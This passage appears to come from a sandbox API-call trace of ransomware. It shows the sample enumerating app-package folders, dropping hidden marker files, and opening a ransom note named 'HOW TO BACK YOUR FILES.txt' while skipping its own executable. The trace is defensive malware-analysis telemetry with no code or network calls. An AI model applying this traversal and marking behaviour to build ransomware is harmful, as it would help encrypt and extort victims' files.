lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" [0062.173] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.173] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.176] FlushFileBuffers (hFile=0x27c) returned 1 [0062.176] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.177] CloseHandle (hObject=0x27c) returned 1 [0062.177] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState") returned 89 [0062.177] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.177] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b10a7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239bf5b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee609838, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0062.177] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.177] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.177] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.177] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.177] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b10a7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239bf5b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee609838, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.177] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.178] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.178] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.178] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.178] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.178] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee609838, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee609838, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee62d548, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.178] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.178] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.178] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee609838, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee609838, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee62d548, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.178] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0062.178] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.178] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.178] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.178] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.179] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.179] CloseHandle (hObject=0x298) returned 1 [0062.179] CloseHandle (hObject=0x27c) returned 1 [0062.179] GetCurrentThreadId () returned 0xd98 [0062.179] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0062.179] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache" [0062.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0062.179] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache" [0062.179] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache\\" [0062.179] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0062.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.182] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.184] FlushFileBuffers (hFile=0x27c) returned 1 [0062.185] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.185] CloseHandle (hObject=0x27c) returned 1 [0062.186] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache") returned 89 [0062.186] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.186] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b8588, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239b4f4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee62d548, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0062.186] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.186] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.186] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.186] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.186] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935b8588, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd239b4f4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee62d548, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.186] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.186] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.186] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.186] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.186] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.186] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee62d548, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee62d548, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee62d548, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.186] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.186] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.186] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee62d548, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee62d548, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee62d548, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.186] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0062.186] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.186] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.187] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.187] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.187] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.187] CloseHandle (hObject=0x298) returned 1 [0062.187] CloseHandle (hObject=0x27c) returned 1 [0062.187] GetCurrentThreadId () returned 0xd98 [0062.187] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0062.188] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData" [0062.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1240e0 | out: hHeap=0xe0000) returned 1 [0062.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0062.188] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData" [0062.188] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData\\" [0062.188] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0062.188] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.188] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.191] FlushFileBuffers (hFile=0x27c) returned 1 [0062.192] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.192] CloseHandle (hObject=0x27c) returned 1 [0062.193] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData") returned 86 [0062.193] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.193] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935c21cd, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935c21cd, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee62d548, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0062.193] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.193] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.193] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.193] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.193] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x935c21cd, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x935c21cd, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee62d548, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.193] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.193] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.193] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.193] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.193] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.193] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee62d548, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee62d548, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee65379c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.193] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.193] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.193] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee62d548, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee62d548, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee65379c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.193] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0062.193] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.193] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.194] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.194] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.194] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.194] CloseHandle (hObject=0x298) returned 1 [0062.194] CloseHandle (hObject=0x27c) returned 1 [0062.194] GetCurrentThreadId () returned 0xd98 [0062.195] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221e8 [0062.195] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC" [0062.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118de8 | out: hHeap=0xe0000) returned 1 [0062.195] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0062.195] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC" [0062.195] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\" [0062.195] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0062.195] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgameoverlay_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.198] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.201] FlushFileBuffers (hFile=0x27c) returned 1 [0062.201] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.202] CloseHandle (hObject=0x27c) returned 1 [0062.202] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC") returned 81 [0062.202] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.202] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x936165c3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9361c775, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee65379c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", 